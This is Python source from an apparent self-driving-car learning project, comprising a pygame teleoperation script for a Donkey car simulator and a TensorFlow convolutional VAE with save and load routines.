moveBindingsGame = {
K_UP: UP,
K_LEFT: LEFT,
K_RIGHT: RIGHT,
K_DOWN: DOWN
}
pygame.font.init()
FONT = pygame.font.SysFont('Open Sans', 25)
SMALL_FONT = pygame.font.SysFont('Open Sans', 20)
KEY_MIN_DELAY = 0.4
MAX_N_OUT_OF_BOUND = FRAME_SKIP
def control(x, theta, control_throttle, control_steering):
"""
Smooth control.
:param x: (float)
:param theta: (float)
:param control_throttle: (float)
:param control_steering: (float)
:return: (float, float)
"""
target_throttle = x
target_steering = MAX_TURN * theta
if target_throttle > control_throttle:
control_throttle = min(target_throttle, control_throttle + STEP_THROTTLE)
elif target_throttle < control_throttle:
control_throttle = max(target_throttle, control_throttle - STEP_THROTTLE)
else:
control_throttle = target_throttle
if target_steering > control_steering:
control_steering = min(target_steering, control_steering + STEP_TURN)
elif target_steering < control_steering:
control_steering = max(target_steering, control_steering - STEP_TURN)
else:
control_steering = target_steering
return control_throttle, control_steering
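# Hedged sketch (not called anywhere in the script): illustrates the smoothing
# above. Holding "up + left" from rest ramps throttle toward MAX_THROTTLE in
# STEP_THROTTLE increments and steering toward MAX_TURN in STEP_TURN increments,
# one step per teleop tick, instead of jumping straight to the targets.
def _demo_control_ramp(n_ticks=3):
    throttle, steering = 0.0, 0.0
    history = []
    for _ in range(n_ticks):
        throttle, steering = control(MAX_THROTTLE, 1.0, throttle, steering)
        history.append((throttle, steering))
    # e.g. with MAX_THROTTLE = 0.6: [(0.3, 0.4), (0.6, 0.8), (0.6, 1.0)]
    return history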
class TeleopEnv(object):
def __init__(self, env, model=None, is_recording=False,
is_training=False, deterministic=True):
super(TeleopEnv, self).__init__()
self.env = env
self.model = model
self.need_reset = False
self.is_manual = True
self.is_recording = is_recording
self.is_training = is_training
# For keyboard trigger
self.fill_buffer = False
# For display
self.is_filling = False
self.current_obs = None
self.exit_event = Event()
self.done_event = Event()
self.ready_event = Event()
# For testing
self.deterministic = deterministic
self.window = None
self.process = None
self.action = None
self.observation_space = env.observation_space
self.action_space = env.action_space
self.donkey_env = None
self.n_out_of_bound = 0
self.current_image = None
self.image_surface = None
self.decoded_surface = None
self.start_process()
def start_process(self):
"""Start preprocessing process"""
self.process = Thread(target=self.main_loop)
        # Make it a daemon thread, so it is terminated together
        # with the main process
self.process.daemon = True
self.process.start()
def step(self, action):
self.action = action
self.current_obs, reward, done, info = self.env.step(action)
# Overwrite done
if self.done_event.is_set():
done = False
# Negative reward for several steps
if self.n_out_of_bound < MAX_N_OUT_OF_BOUND:
self.n_out_of_bound += 1
else:
done = True
# penalize the agent for getting off the road fast
norm_throttle = (action[1] - MIN_THROTTLE) / (MAX_THROTTLE - MIN_THROTTLE)
reward = REWARD_CRASH - CRASH_SPEED_WEIGHT * norm_throttle
else:
done = False
return self.current_obs, reward, done, info
def render(self, mode='human'):
return self.env.render(mode)
def reset(self):
self.n_out_of_bound = 0
# Disable reset after init
if self.need_reset:
self.need_reset = False
return self.env.reset()
else:
# Zero speed, neutral angle
self.donkey_env.controller.take_action([0, 0])
return self.current_obs
def wait_for_teleop_reset(self):
self.ready_event.wait()
return self.reset()
def exit(self):
self.env.reset()
self.donkey_env.exit_scene()
def wait(self):
self.process.join()
def main_loop(self):
        # Pygame requires a window
pygame.init()
self.window = pygame.display.set_mode((800, 500), RESIZABLE)
end = False
control_throttle, control_steering = 0, 0
action = [control_steering, control_throttle]
self.update_screen(action)
donkey_env = self.env
# Unwrap env
if isinstance(donkey_env, Recorder):
donkey_env = donkey_env.env
while isinstance(donkey_env, VecNormalize) or isinstance(donkey_env, VecFrameStack):
donkey_env = donkey_env.venv
if isinstance(donkey_env, DummyVecEnv):
donkey_env = donkey_env.envs[0]
if isinstance(donkey_env, Monitor):
donkey_env = donkey_env.env
assert isinstance(donkey_env, DonkeyVAEEnv), print(donkey_env)
self.donkey_env = donkey_env
last_time_pressed = {'space': 0, 'm': 0, 't': 0, 'b': 0, 'o': 0}
self.current_obs = self.reset()
if self.model is not None:
# Prevent error (uninitialized value)
self.model.n_updates = 0
while not end:
x, theta = 0, 0
keys = pygame.key.get_pressed()
for keycode in moveBindingsGame.keys():
if keys[keycode]:
x_tmp, th_tmp = moveBindingsGame[keycode]
x += x_tmp
theta += th_tmp
if keys[K_SPACE] and (time.time() - last_time_pressed['space']) > KEY_MIN_DELAY:
self.is_recording = not self.is_recording
if isinstance(self.env, Recorder):
self.env.toggle_recording()
# avoid multiple key press
last_time_pressed['space'] = time.time()
if keys[K_m] and (time.time() - last_time_pressed['m']) > KEY_MIN_DELAY:
self.is_manual = not self.is_manual
# avoid multiple key press
last_time_pressed['m'] = time.time()
if self.is_training:
if self.is_manual:
# Stop training
self.ready_event.clear()
self.done_event.set()
else:
# Start training
self.done_event.clear()
self.ready_event.set()
if keys[K_t] and (time.time() - last_time_pressed['t']) > KEY_MIN_DELAY:
self.is_training = not self.is_training
# avoid multiple key press
last_time_pressed['t'] = time.time()
if keys[K_b] and (time.time() - last_time_pressed['b']) > KEY_MIN_DELAY:
self.fill_buffer = not self.fill_buffer
# avoid multiple key press
last_time_pressed['b'] = time.time()
if keys[K_r]:
self.current_obs = self.env.reset()
if keys[K_o]:
if (self.is_manual
and self.model is not None
and hasattr(self.model, 'optimize')
and (time.time() - last_time_pressed['o']) > KEY_MIN_DELAY):
print("Optimizing")
self.model.optimize(len(self.model.replay_buffer), None, self.model.learning_rate(1))
last_time_pressed['o'] = time.time()
if keys[K_l]:
self.env.reset()
self.donkey_env.exit_scene()
self.need_reset = True
# Smooth control for teleoperation
control_throttle, control_steering = control(x, theta, control_throttle, control_steering)
# Send Orders
if self.model is None or self.is_manual:
t = (control_steering + MAX_TURN) / (2 * MAX_TURN)
steering_order = MIN_STEERING * t + MAX_STEERING * (1 - t)
self.action = [steering_order, control_throttle]
elif self.model is not None and not self.is_training:
self.action, _ = self.model.predict(self.current_obs, deterministic=self.deterministic)
self.is_filling = False
if not (self.is_training and not self.is_manual):
if self.is_manual and not self.fill_buffer:
donkey_env.controller.take_action(self.action)
self.current_obs, reward, done, info = donkey_env.observe()
self.current_obs, _, _, _ = donkey_env.postprocessing_step(self.action, self.current_obs,
reward, done, info)
else:
if self.fill_buffer:
old_obs = self.current_obs
self.current_obs, reward, done, _ = self.env.step(self.action)
# Store the transition in the replay buffer
if self.fill_buffer and hasattr(self.model, 'replay_buffer'):
assert old_obs is not None
if old_obs.shape[1] == self.current_obs.shape[1]:
self.is_filling = True
self.model.replay_buffer.add(old_obs, self.action, reward, self.current_obs, float(done))
if isinstance(self.env, Recorder):
self.env.save_image()
self.current_image = self.env.render(mode='rgb_array')
self.update_screen(self.action)
for event in pygame.event.get():
if event.type == QUIT or event.type == KEYDOWN and event.key in [K_ESCAPE, K_q]:
end = True
pygame.display.flip()
# Limit FPS
pygame.time.Clock().tick(1 / TELEOP_RATE)
self.ready_event.set()
self.exit_event.set()
def write_text(self, text, x, y, font, color=GREY):
text = str(text)
text = font.render(text, True, color)
self.window.blit(text, (x, y))
def clear(self):
self.window.fill((0, 0, 0))
def update_screen(self, action):
self.clear()
steering, throttle = action
self.write_text('Throttle: {:.2f}, Steering: {:.2f}'.format(throttle, steering), 20, 0, FONT, WHITE)
help_str = 'Use arrow keys to move, q or ESCAPE to exit.'
self.write_text(help_str, 20, 50, SMALL_FONT)
help_2 = 'space key: toggle recording -- m: change mode -- r: reset -- l: reset track'
self.write_text(help_2, 20, 100, SMALL_FONT)
if isinstance(self.env, Recorder):
self.write_text('Recording Status:', 20, 150, SMALL_FONT, WHITE)
if self.is_recording:
text, text_color = 'RECORDING', RED
else:
text, text_color = 'NOT RECORDING', GREEN
self.write_text(text, 200, 150, SMALL_FONT, text_color)
self.write_text('Mode:', 20, 200, SMALL_FONT, WHITE)
if self.is_manual:
text, text_color = 'MANUAL', GREEN
else:
text, text_color = 'AUTONOMOUS', ORANGE
self.write_text(text, 200, 200, SMALL_FONT, text_color)
self.write_text('Training Status:', 20, 250, SMALL_FONT, WHITE)
if self.is_training:
text, text_color = 'TRAINING', RED
else:
text, text_color = 'TESTING', GREEN
self.write_text(text, 200, 250, SMALL_FONT, text_color)
if self.is_filling:
text, text_color = 'FILLING THE BUFFER', RED
else:
text, text_color = '', GREEN
self.write_text(text, 200, 300, SMALL_FONT, text_color)
if self.current_image is not None and SHOW_IMAGES_TELEOP:
current_image = np.swapaxes(self.current_image, 0, 1)
if self.image_surface is None:
self.image_surface = pygame.pixelcopy.make_surface(current_image)
pygame.pixelcopy.array_to_surface(self.image_surface, current_image)
self.window.blit(self.image_surface, (20, 350))
if (self.donkey_env is not None
and self.donkey_env.vae is not None
and self.current_obs is not None
and SHOW_IMAGES_TELEOP):
vae_dim = self.donkey_env.vae.z_size
encoded = self.current_obs[:, :vae_dim]
reconstructed_image = self.donkey_env.vae.decode(encoded)[0]
# Convert BGR to RGB
# reconstructed_image = reconstructed_image[:, :, ::-1]
reconstructed_image = np.swapaxes(reconstructed_image, 0, 1)
if self.decoded_surface is None:
self.decoded_surface = pygame.pixelcopy.make_surface(reconstructed_image)
pygame.pixelcopy.array_to_surface(self.decoded_surface, reconstructed_image)
self.window.blit(self.decoded_surface, (220, 350))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', help='Log folder', type=str, default='logs')
parser.add_argument('--record-folder', help='Record folder, where images are saved', type=str,
default='logs/recorded_data/')
parser.add_argument('--algo', help='RL Algorithm', default='',
type=str, required=False, choices=list(ALGOS.keys()))
parser.add_argument('-n', '--n-timesteps', help='number of timesteps', default=1000,
type=int)
parser.add_argument('--exp-id', help='Experiment ID (-1: no exp folder, 0: latest)', default=0,
type=int)
parser.add_argument('-vae', '--vae-path', help='Path to saved VAE', type=str, default='')
args = parser.parse_args()
algo = args.algo
folder = args.folder
model = None
vae = None
os.environ['DONKEY_NAME'] = "my_robot1234"
os.environ['DONKEY_MQTT_BROKER'] = "192.168.0.24"
if algo != '':
if args.exp_id == 0:
args.exp_id = get_latest_run_id(os.path.join(folder, algo), ENV_ID)
print('Loading latest experiment, id={}'.format(args.exp_id))
# Sanity checks
if args.exp_id > 0:
log_path = os.path.join(folder, algo, '{}_{}'.format(ENV_ID, args.exp_id))
else:
log_path = os.path.join(folder, algo)
model_path = "{}/{}.pkl".format(log_path, ENV_ID)
assert os.path.isdir(log_path), "The {} folder was not found".format(log_path)
assert os.path.isfile(model_path), "No model found for {} on {}, path: {}".format(algo, ENV_ID, model_path)
model = ALGOS[algo].load(model_path)
if args.vae_path != '':
print("Loading VAE ...")
vae = load_vae(args.vae_path)
if vae is None:
N_COMMAND_HISTORY = 0
env = DonkeyVAEEnv(level=LEVEL, frame_skip=TEST_FRAME_SKIP, vae=vae, const_throttle=None, min_throttle=MIN_THROTTLE,
max_throttle=MAX_THROTTLE, max_cte_error=10, n_command_history=N_COMMAND_HISTORY)
env = Recorder(env, folder=args.record_folder, verbose=1)
try:
env = TeleopEnv(env, model=model)
env.wait()
except KeyboardInterrupt as e:
pass
finally:
env.exit()
time.sleep(0.5)
```
#### File: learning-to-drive-in-5-minutes/vae/model.py
```python
import os
import json
import cloudpickle
import numpy as np
import tensorflow as tf
def conv_to_fc(input_tensor):
"""
Reshapes a Tensor from a convolutional network to a Tensor for a fully connected network
:param input_tensor: (TensorFlow Tensor) The convolutional input tensor
:return: (TensorFlow Tensor) The fully connected output tensor
"""
n_hidden = np.prod([v.value for v in input_tensor.get_shape()[1:]])
input_tensor = tf.reshape(input_tensor, [-1, n_hidden])
return input_tensor
class ConvVAE(object):
"""
:param z_size: (int)
:param batch_size: (int)
:param learning_rate: (float)
:param kl_tolerance: (float)
:param is_training: (bool)
:param beta: (float) weight for KL loss
:param reuse: (bool)
"""
def __init__(self, z_size=512, batch_size=100, learning_rate=0.0001,
kl_tolerance=0.5, is_training=True, beta=1.0, reuse=False):
self.z_size = z_size
self.batch_size = batch_size
self.learning_rate = learning_rate
self.is_training = is_training
self.kl_tolerance = kl_tolerance
self.beta = beta
self.reuse = reuse
self.graph = None
self.input_tensor = None
self.output_tensor = None
with tf.variable_scope('conv_vae', reuse=self.reuse):
self._build_graph()
with self.graph.as_default():
self.params = tf.trainable_variables()
self._init_session()
def _build_graph(self):
self.graph = tf.Graph()
with self.graph.as_default():
self.input_tensor = tf.placeholder(tf.float32, shape=[None, 80, 160, 3])
# Encoder
h = tf.layers.conv2d(self.input_tensor, 32, 4, strides=2, activation=tf.nn.relu, name="enc_conv1")
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv2")
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv3")
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv4")
# h = tf.reshape(h, [-1, 3 * 8 * 256])
h = conv_to_fc(h)
# VAE
self.mu = tf.layers.dense(h, self.z_size, name="enc_fc_mu")
self.logvar = tf.layers.dense(h, self.z_size, name="enc_fc_log_var")
self.sigma = tf.exp(self.logvar / 2.0)
self.epsilon = tf.random_normal([self.batch_size, self.z_size])
# self.epsilon = tf.random_normal([None, self.z_size])
# self.z = self.mu + self.sigma * self.epsilon
if self.is_training:
self.z = self.mu + self.sigma * self.epsilon
else:
self.z = self.mu
# Decoder
h = tf.layers.dense(self.z, 3 * 8 * 64, name="dec_fc")
h = tf.reshape(h, [-1, 3, 8, 64])
h = tf.layers.conv2d_transpose(h, 64, 4, strides=2, activation=tf.nn.relu, name="dec_deconv1")
h = tf.layers.conv2d_transpose(h, 64, 4, strides=2, activation=tf.nn.relu, name="dec_deconv2")
h = tf.layers.conv2d_transpose(h, 32, 5, strides=2, activation=tf.nn.relu, name="dec_deconv3")
self.output_tensor = tf.layers.conv2d_transpose(h, 3, 4, strides=2, activation=tf.nn.sigmoid,
name="dec_deconv4")
# train ops
if self.is_training:
self.global_step = tf.Variable(0, name='global_step', trainable=False)
# reconstruction loss
self.r_loss = tf.reduce_sum(
tf.square(self.input_tensor - self.output_tensor),
reduction_indices=[1, 2, 3]
)
self.r_loss = tf.reduce_mean(self.r_loss)
# augmented kl loss per dim
self.kl_loss = - 0.5 * tf.reduce_sum(
(1 + self.logvar - tf.square(self.mu) - tf.exp(self.logvar)),
reduction_indices=1
)
if self.kl_tolerance > 0:
self.kl_loss = tf.maximum(self.kl_loss, self.kl_tolerance * self.z_size)
self.kl_loss = tf.reduce_mean(self.kl_loss)
self.loss = self.r_loss + self.beta * self.kl_loss
# training
self.lr = tf.Variable(self.learning_rate, trainable=False)
self.optimizer = tf.train.AdamOptimizer(self.lr)
grads = self.optimizer.compute_gradients(self.loss) # can potentially clip gradients here.
self.train_op = self.optimizer.apply_gradients(
grads, global_step=self.global_step, name='train_step')
# initialize vars
self.init = tf.global_variables_initializer()
def _init_session(self):
"""Launch tensorflow session and initialize variables"""
self.sess = tf.Session(graph=self.graph)
self.sess.run(self.init)
def close_sess(self):
""" Close tensorflow session """
self.sess.close()
def encode(self, input_tensor):
return self.sess.run(self.z, feed_dict={self.input_tensor: input_tensor})
def decode(self, z):
return self.sess.run(self.output_tensor, feed_dict={self.z: z})
def get_model_params(self):
# get trainable params.
model_names = []
model_params = []
model_shapes = []
with self.graph.as_default():
t_vars = tf.trainable_variables()
for var in t_vars:
param_name = var.name
p = self.sess.run(var)
model_names.append(param_name)
params = np.round(p * 10000).astype(np.int).tolist()
model_params.append(params)
model_shapes.append(p.shape)
return model_params, model_shapes, model_names
def set_params(self, params):
assign_ops = []
for param, loaded_p in zip(self.params, params):
assign_ops.append(param.assign(loaded_p))
self.sess.run(assign_ops)
def get_params(self):
return self.sess.run(self.params)
def set_model_params(self, params):
with self.graph.as_default():
t_vars = tf.trainable_variables()
idx = 0
for var in t_vars:
pshape = self.sess.run(var).shape
p = np.array(params[idx])
assert pshape == p.shape, "inconsistent shape"
assign_op = var.assign(p.astype(np.float) / 10000.)
self.sess.run(assign_op)
idx += 1
def load_json(self, jsonfile='vae.json'):
with open(jsonfile, 'r') as f:
params = json.load(f)
self.set_model_params(params)
def save_json(self, jsonfile='vae.json'):
model_params, model_shapes, model_names = self.get_model_params()
qparams = []
for p in model_params:
qparams.append(p)
with open(jsonfile, 'wt') as outfile:
json.dump(qparams, outfile, sort_keys=True, indent=0, separators=(',', ': '))
def save_model(self, model_save_path):
sess = self.sess
with self.graph.as_default():
saver = tf.train.Saver(tf.global_variables())
checkpoint_path = os.path.join(model_save_path, 'vae')
tf.logging.info('saving model %s.', checkpoint_path)
saver.save(sess, checkpoint_path, 0) # just keep one
def load_checkpoint(self, checkpoint_path):
sess = self.sess
with self.graph.as_default():
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(checkpoint_path)
print('loading model', ckpt.model_checkpoint_path)
tf.logging.info('Loading model %s.', ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
@staticmethod
def _save_to_file(save_path, data=None, params=None):
if isinstance(save_path, str):
_, ext = os.path.splitext(save_path)
if ext == "":
save_path += ".pkl"
with open(save_path, "wb") as file_:
cloudpickle.dump((data, params), file_)
else:
# Here save_path is a file-like object, not a path
cloudpickle.dump((data, params), save_path)
def save(self, save_path):
data = {
"z_size": self.z_size,
"batch_size": self.batch_size,
"learning_rate": self.learning_rate,
"is_training": self.is_training,
"kl_tolerance": self.kl_tolerance
}
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
@staticmethod
def _load_from_file(load_path):
if isinstance(load_path, str):
if not os.path.exists(load_path):
if os.path.exists(load_path + ".pkl"):
load_path += ".pkl"
else:
raise ValueError("Error: the file {} could not be found".format(load_path))
with open(load_path, "rb") as file:
data, params = cloudpickle.load(file)
else:
# Here load_path is a file-like object, not a path
data, params = cloudpickle.load(load_path)
return data, params
@classmethod
def load(cls, load_path, **kwargs):
data, params = cls._load_from_file(load_path)
model = cls(data['z_size'], data['batch_size'],
data['learning_rate'], data['kl_tolerance'],
data['is_training'])
model.__dict__.update(data)
model.__dict__.update(kwargs)
restores = []
for param, loaded_p in zip(model.params, params):
restores.append(param.assign(loaded_p))
model.sess.run(restores)
return model
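# Hedged usage sketch (not part of the original module): encode a dummy batch
# of frames and decode the latents back to images. Assumes inputs are float32
# in [0, 1] with shape (N, 80, 160, 3), matching the placeholder defined in
# _build_graph(); z_size=64 and the batch of 4 are illustrative values only.
def _demo_vae_roundtrip():
    vae = ConvVAE(z_size=64, batch_size=4, is_training=False)
    images = np.random.rand(4, 80, 160, 3).astype(np.float32)
    latents = vae.encode(images)            # shape (4, 64)
    reconstructions = vae.decode(latents)   # shape (4, 80, 160, 3), values in [0, 1]
    vae.close_sess()
    return reconstructions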
``` |